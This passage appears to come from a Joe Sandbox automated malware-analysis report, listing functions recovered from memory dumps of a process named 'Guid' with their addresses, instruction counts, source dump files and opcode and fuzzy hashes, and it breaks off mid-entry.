                                                                          Function 06070C18 Relevance: .1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 36b2da9dc0d0d6cc949162ffdd278be91dd59bcbe46c2cfb5e35632f958e7747
                                                                          • Instruction ID: aade23047d4680178d57934ede2c591f73cc87595bafa254a2b9d5d384552c46
                                                                          • Opcode Fuzzy Hash: 36b2da9dc0d0d6cc949162ffdd278be91dd59bcbe46c2cfb5e35632f958e7747
                                                                          • Instruction Fuzzy Hash: F74157B0E00208DFEB94DF99D894BADBBF6FB49301F0081AAD10AA7254DB705D85CF64
                                                                          Function 060715C0 Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b24eaa0e0bf77bb57f6022dec38366b1cd7044cbc0098ca834ec5af42bb9159e
                                                                          • Instruction ID: 2188086fd40621c2ac80a6aa9b03c4d60ccec1411f9f99394f7c05cd0835975e
                                                                          • Opcode Fuzzy Hash: b24eaa0e0bf77bb57f6022dec38366b1cd7044cbc0098ca834ec5af42bb9159e
                                                                          • Instruction Fuzzy Hash: 22412570E05218CFEB94DF6AD840BADBBF6FB89300F1480A9C409A7298DB304E85CF55
                                                                          Function 06070D6F Relevance: .1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d06aab5a420fff0f66e47c02c487d252669324ecb039e0612a3c5f6db8e44903
                                                                          • Instruction ID: 122b21ca8b45be271ec8ca8a5cdc14a5290910f5e1c8105d8ebe10c2c2e23004
                                                                          • Opcode Fuzzy Hash: d06aab5a420fff0f66e47c02c487d252669324ecb039e0612a3c5f6db8e44903
                                                                          • Instruction Fuzzy Hash: 314136B0E45208CFDB84DF98D894BADBBF2FB49300F1091A9D10AAB254CB745D85CF64
                                                                          Function 015A17C5 Relevance: .1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6ff61d09b2b87e25023b6e14257c37e90364de9dbbbefe274efe005b59555fd1
                                                                          • Instruction ID: 77fb3dfe0d3c65cc7cd8e23170cbfdd2fed6c72a7e207a8f210716e0a9019631
                                                                          • Opcode Fuzzy Hash: 6ff61d09b2b87e25023b6e14257c37e90364de9dbbbefe274efe005b59555fd1
                                                                          • Instruction Fuzzy Hash: 93415670D0164A9FEB14DFA9C480BEEBFF5BF48740F248429E519AB250DB749D41CB90
                                                                          Function 015A1678 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e7a247c8d76712996161a7ac84a61ff7a2037e1c41667fd58d3edc1bcc6df7b1
                                                                          • Instruction ID: be24faac91e76e27b487d3ff3a1ae78d48414ed11960843d62773b33c3dc4a03
                                                                          • Opcode Fuzzy Hash: e7a247c8d76712996161a7ac84a61ff7a2037e1c41667fd58d3edc1bcc6df7b1
                                                                          • Instruction Fuzzy Hash: C7319C35B005189FCF05DF69D98099EFBF2BF89750F94856AE905EB342DB30AD048BA1
                                                                          Function 06071977 Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b8dc022fea9b2b083f74068813514356c86b16aeb5781efb8297058754b8ce9
                                                                          • Instruction ID: 73177fe8fbc0419b6d10ebf1a889acc78feb081c224ebb7d112879aacfa8dede
                                                                          • Opcode Fuzzy Hash: 0b8dc022fea9b2b083f74068813514356c86b16aeb5781efb8297058754b8ce9
                                                                          • Instruction Fuzzy Hash: 2A310370E45218CFEB94DF69C890BADBBF2FB89300F1491A98009A7298D7345E82CF55
                                                                          Function 06070C8A Relevance: .1, Instructions: 89COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 763b0d7d2978fed0bd486933a22a33c1df090e71f9cee14626b505d2d342ad2b
                                                                          • Instruction ID: 97a4bc08cdfade5f4f2b20a79fe72250c6522542d31357c795d7fc197e6ce5dd
                                                                          • Opcode Fuzzy Hash: 763b0d7d2978fed0bd486933a22a33c1df090e71f9cee14626b505d2d342ad2b
                                                                          • Instruction Fuzzy Hash: D64126B4D45208DFDB84DF98D894B9CBBF2FB09301F1091AAD20AAB264CB745D85CF24
                                                                          Function 060712E8 Relevance: .1, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb22573311c5d968cc2a8974cf60d31b8037cc4e4b4b90f167d9c7313b09df6f
                                                                          • Instruction ID: 24c315725759872941eaac1462ffa98a71cf33896ae11d5031b050f40e650c04
                                                                          • Opcode Fuzzy Hash: bb22573311c5d968cc2a8974cf60d31b8037cc4e4b4b90f167d9c7313b09df6f
                                                                          • Instruction Fuzzy Hash: B7316670E44249DFDB80DFA9D8546AEBBF6FB89300F1484AAD409A7284DB395A45CF90
                                                                          Function 06071A8C Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5d6832bd6215c46d410a021a6dd74a3f2ec18d7968df4bbb4f9b013e890ebe5a
                                                                          • Instruction ID: 2f91b36443c2479b4b1d4e8c98502fca0b890bb735e0816137992b0ef4b1a7db
                                                                          • Opcode Fuzzy Hash: 5d6832bd6215c46d410a021a6dd74a3f2ec18d7968df4bbb4f9b013e890ebe5a
                                                                          • Instruction Fuzzy Hash: 12310274E0521CCFEB90DF68D890BAEBBB2FB49304F1491A9C409A7298D7344E85CF65
                                                                          Function 015A93F1 Relevance: .1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c2ce0e86e472fa24ff3043d0abb75b4a4942b28c1e04c85d29204c10b04e5505
                                                                          • Instruction ID: de4b2e7e30debd9b78fa7b9a46404b095878a703488151485d5451059cc7ed52
                                                                          • Opcode Fuzzy Hash: c2ce0e86e472fa24ff3043d0abb75b4a4942b28c1e04c85d29204c10b04e5505
                                                                          • Instruction Fuzzy Hash: 7A316DB4942618DFDB40EFA8D4487AEBBF2FB49308F9081A9D105EB255D7388A84CF51
                                                                          Function 015A1668 Relevance: .1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cadb5a3f760fa939a4eb1f7c851b699741397a598869a2117d155048684b0f2
                                                                          • Instruction ID: 602f4cf755aed582a505698eaca47f64ba5c60dbb7fe309b16c40de03dbc7fc2
                                                                          • Opcode Fuzzy Hash: 0cadb5a3f760fa939a4eb1f7c851b699741397a598869a2117d155048684b0f2
                                                                          • Instruction Fuzzy Hash: 7A31C031A046089FCF01DF79D98059EBBF2FF89350F94852AE945AB301DB30AD048BA1
                                                                          Function 06071A44 Relevance: .1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e2981c8d84a79e6cb89b883ee8ae7c47379bc70af0baad216f2d6fa36407b78
                                                                          • Instruction ID: 587b75df45e389e82cd6860bf2944be4cd6540e88bc182574614578cf7f43699
                                                                          • Opcode Fuzzy Hash: 0e2981c8d84a79e6cb89b883ee8ae7c47379bc70af0baad216f2d6fa36407b78
                                                                          • Instruction Fuzzy Hash: A2310274E0521CCFDB90DF68D890BADBBB2FB49304F1491A9C009A7298D7344E85CF55
                                                                          Function 015A17D0 Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 556587e2b80e0a1635e647c3808b9ad60300cd0739b0c932b3f9bfbc4a60d317
                                                                          • Instruction ID: 0f715a9505189b1925ced7a6cc9785d4bc8eafce1b6f5088f094ea28c1ee2d5f
                                                                          • Opcode Fuzzy Hash: 556587e2b80e0a1635e647c3808b9ad60300cd0739b0c932b3f9bfbc4a60d317
                                                                          • Instruction Fuzzy Hash: 1F315570D0024A9FDB14CFAAC580ADEBFF6BF48740F248429E909AB250DB749941CFA0
                                                                          Function 06071A0F Relevance: .1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6fa0309e08fa7e37c4522400a3b084da86bf28f29ed54d5c8e32dd5e4c22c34f
                                                                          • Instruction ID: 261cef8e0f0a28b556b90d51dd00d172a3bfc23c8416d479d6df43f153c58062
                                                                          • Opcode Fuzzy Hash: 6fa0309e08fa7e37c4522400a3b084da86bf28f29ed54d5c8e32dd5e4c22c34f
                                                                          • Instruction Fuzzy Hash: 3731FD70E0521CCFEB90DF68D890BAEBBF2FB49304F1490A98009A7298D7345E81CF55
                                                                          Function 060717F5 Relevance: .1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2134098e3c7d3a68ade10813f99a90284fbb13655440662bc76b237d892e5219
                                                                          • Instruction ID: 658300c0033249fb7a6266bff9c7a37d08e3b86e599941852e3afb4186e28f26
                                                                          • Opcode Fuzzy Hash: 2134098e3c7d3a68ade10813f99a90284fbb13655440662bc76b237d892e5219
                                                                          • Instruction Fuzzy Hash: 9E31FE70E05218CFEB94DF69D880B9EBBF2FB89300F1490A98409A7298D7304E82CF55
                                                                          Function 015A09B8 Relevance: .1, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 066d3e75cfecb9dd7cbb3c0393db168319562d2387dd3a0909b729bdad068256
                                                                          • Instruction ID: 0041cc7ee45498ffadef64a64146bb89fe88846a37948cc8ec3dc3d2b7071268
                                                                          • Opcode Fuzzy Hash: 066d3e75cfecb9dd7cbb3c0393db168319562d2387dd3a0909b729bdad068256
                                                                          • Instruction Fuzzy Hash: 6021A930A111059FDB50EF79D898AAEBBF2BF89720F644429F405EB3A0CB709C41CB55
                                                                          Function 015A9400 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 531388d900d3c1e78466972e4712ec2ba3d023152f576e0a8f707fd768b830a2
                                                                          • Instruction ID: 9b1e21435917eb1419eaea3b0dce7520ed53047a5228a45101b12eea974c5a81
                                                                          • Opcode Fuzzy Hash: 531388d900d3c1e78466972e4712ec2ba3d023152f576e0a8f707fd768b830a2
                                                                          • Instruction Fuzzy Hash: A2314DB4D41618DFDB44EFA8D0487AEBBF2FB49309F9081A9C109E7254D7788A84CF51
                                                                          Function 015AD4B0 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 250e0a2e88caa7ed2acfad426164ef0a7062c352839ff5a83031ba8222150934
                                                                          • Instruction ID: 6fc50983dfaa28a8f7a5aa0e1b943fa01106f5d7e9e19e2fe578b9fbf196c4c2
                                                                          • Opcode Fuzzy Hash: 250e0a2e88caa7ed2acfad426164ef0a7062c352839ff5a83031ba8222150934
                                                                          • Instruction Fuzzy Hash: D3212274E00209CBDB04EFE9D8447EEBBF6FB89704F108529D115A7254DBB45944CB91
                                                                          Function 012CD05C Relevance: .1, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2449182996.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_12cd000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8a11560208fd7d07803b47bc04a0cd32482b8b2254236ef8b04d78a1044e3c77
                                                                          • Instruction ID: 4ef5d45f37d6795cc39141e829b52f11250f3f50738e640585d5e5f06da759d4
                                                                          • Opcode Fuzzy Hash: 8a11560208fd7d07803b47bc04a0cd32482b8b2254236ef8b04d78a1044e3c77
                                                                          • Instruction Fuzzy Hash: 7C210376124248DFDB15DF58D9C0B26BB65FB84B14F20C67DEA090A242C376D40ACAA2
                                                                          Function 015A09C8 Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47140d1dae176896265100150227dd1801bb4a32f84dccaae897405e97cf8a86
                                                                          • Instruction ID: e97666facff93f0edd67a4d548e9624534314d61e67ece43c2f9cfab96db5da7
                                                                          • Opcode Fuzzy Hash: 47140d1dae176896265100150227dd1801bb4a32f84dccaae897405e97cf8a86
                                                                          • Instruction Fuzzy Hash: DE215C30A102199FCB54EF79D898AADBBF6BF88710F604469E505EB3A0CA719C01CB91
                                                                          Function 060718B3 Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 33d7f03901bac64d755262c92a8e6b2b27fc34e3444dafe47aae3d90543c5176
                                                                          • Instruction ID: 4fb118ac626b430008a28a89f5abf34cc43b7b6df8e47d11108adffd321f9176
                                                                          • Opcode Fuzzy Hash: 33d7f03901bac64d755262c92a8e6b2b27fc34e3444dafe47aae3d90543c5176
                                                                          • Instruction Fuzzy Hash: D5310270E1521CCFDB94DF68D890BAEBBB2FB49300F1491A9C409A7298D7305E81CF65
                                                                          Function 0607107C Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c2238bc4c8513a413825fd8870cbb39f82bf92956d2fd9815575a0efb014716
                                                                          • Instruction ID: eb293015de59399fef4c733d0e49ca32b24460e2fc0ac8c32ba18530c9079533
                                                                          • Opcode Fuzzy Hash: 4c2238bc4c8513a413825fd8870cbb39f82bf92956d2fd9815575a0efb014716
                                                                          • Instruction Fuzzy Hash: D331B374A11219CFDBA4EF24DCA4B9EB7B2FB49300F1081E9954AA7358DB301E85CF51
                                                                          Function 060712F8 Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cbbcda31fa6182149544bfcaa1618909f8c258dfd928f8d325e09daaa37ce4e7
                                                                          • Instruction ID: aee67f9a5ab610cefea2ee0f2140258d7c479b209b29ac08c25d9d36e843e10b
                                                                          • Opcode Fuzzy Hash: cbbcda31fa6182149544bfcaa1618909f8c258dfd928f8d325e09daaa37ce4e7
                                                                          • Instruction Fuzzy Hash: 38213470E44209CFDB44DFA9D8447BEBBF6FB89304F1480A9D119A3688DB385A85CF94
                                                                          Function 015A08B9 Relevance: .1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 22d728fac818a04e3dd9612e53b4ae67123e1a82288f226dbe6e3dd0200e367c
                                                                          • Instruction ID: 2e9b95c94571758bc46bedb24db97c7e942a083431121f31cd1f13d0c52b8248
                                                                          • Opcode Fuzzy Hash: 22d728fac818a04e3dd9612e53b4ae67123e1a82288f226dbe6e3dd0200e367c
                                                                          • Instruction Fuzzy Hash: 34114F35720204AFD345DB2DD894E6A3BE6FF89750B504569E109CB7A5DE61EC018B90
                                                                          Function 015A08C8 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b948fa3a218b92c8464b8b4db600ac70af8f47910f2fe1fa7d082390220d3e2
                                                                          • Instruction ID: 3041ed914ca89fbe6a2ff04ee69ed5f9f152e75fb3c96c6229c4c75830b4b1c4
                                                                          • Opcode Fuzzy Hash: 7b948fa3a218b92c8464b8b4db600ac70af8f47910f2fe1fa7d082390220d3e2
                                                                          • Instruction Fuzzy Hash: 0E112A347502159FD345EB2ED898A6E7BEAFFC87507508169E609CB3A5DE60EC018B90
                                                                          Function 015AE8A0 Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cd86464bea9cdee845810240b7357dffc2748b19b56b37a8f4cd7a230dbecd71
                                                                          • Instruction ID: b21e8e692e02be51ad233d426b21773988317e6d649eb3bbffd990322f59efc0
                                                                          • Opcode Fuzzy Hash: cd86464bea9cdee845810240b7357dffc2748b19b56b37a8f4cd7a230dbecd71
                                                                          • Instruction Fuzzy Hash: AD1134B1D0420ACFDB04DFAAD8456EEBBF6FB88310F40842AD508B7200D7345A45CFA1
                                                                          Function 012CD057 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2449182996.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_12cd000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4b5c62d74ef7dbd0f0298782f6981a4020ab818640269a2a7c5de0ff3647828
                                                                          • Instruction ID: c20d06313af26ffda0eff61d3cb9541e02004f3f5a1387ce49c4484670c41b2a
                                                                          • Opcode Fuzzy Hash: b4b5c62d74ef7dbd0f0298782f6981a4020ab818640269a2a7c5de0ff3647828
                                                                          • Instruction Fuzzy Hash: 6711EE76404284CFCB02CF14DAC0B16BFB2FB84714F2482ADDA080B656C33AD41ACBA2
                                                                          Function 015A0BB0 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fdd94e075a0b8d55f10372531554137101c543964e8191f8be33f904886853a1
                                                                          • Instruction ID: f3bb750e0c4df554905e32d96c88e653c7e93ce6b50286d776bd194f67105aa4
                                                                          • Opcode Fuzzy Hash: fdd94e075a0b8d55f10372531554137101c543964e8191f8be33f904886853a1
                                                                          • Instruction Fuzzy Hash: 4D01B532E6020ADFDF14DB64D4559FEFBB6EF84321F008526E602AB680DF70190687D1
                                                                          Function 07680B81 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9d0f0a9b9ab1e1e0cfe96b21663a01bac7e0d634c8380a799c3743e68f8c66a8
                                                                          • Instruction ID: 4e00522b8fabada3b1273dc3f765c07e8a7c68ad00869f0c4dd2edbfba65b46c
                                                                          • Opcode Fuzzy Hash: 9d0f0a9b9ab1e1e0cfe96b21663a01bac7e0d634c8380a799c3743e68f8c66a8
                                                                          • Instruction Fuzzy Hash: B021B4B8A14228CFDB64EF68C898AD9B7F2FB48349F0051D5D51AA7354D7705E85CF40
                                                                          Function 06073767 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5327b9c9f6cca376b99cd9a1d20b0a3a2a49ef72c337abf2bb4bd3542822cf03
                                                                          • Instruction ID: f40c24d239bdbedb956334a1c831d0942ebd7ffba6e1c0d60df0be400370b4f2
                                                                          • Opcode Fuzzy Hash: 5327b9c9f6cca376b99cd9a1d20b0a3a2a49ef72c337abf2bb4bd3542822cf03
                                                                          • Instruction Fuzzy Hash: 0221AB78D05229CFDBA0DF24C994BE9BBB2FB48304F0080DA950DA7245DB319E86CF40
                                                                          Function 015A0B28 Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b4dd33407f4a0e1aa09c25ad26303a84b31d3252d21911ea770da845febf15e
                                                                          • Instruction ID: e5d7b947e9b2035dc0ce6bb79a4ce7bba73856a415ddd3ac35fb08b3d69fd8bb
                                                                          • Opcode Fuzzy Hash: 7b4dd33407f4a0e1aa09c25ad26303a84b31d3252d21911ea770da845febf15e
                                                                          • Instruction Fuzzy Hash: AF019E32D2474A9ACB01DBBADC448DDBB72EEC6715F554716E20077260EB70254AC7A2
                                                                          Function 06070BCB Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
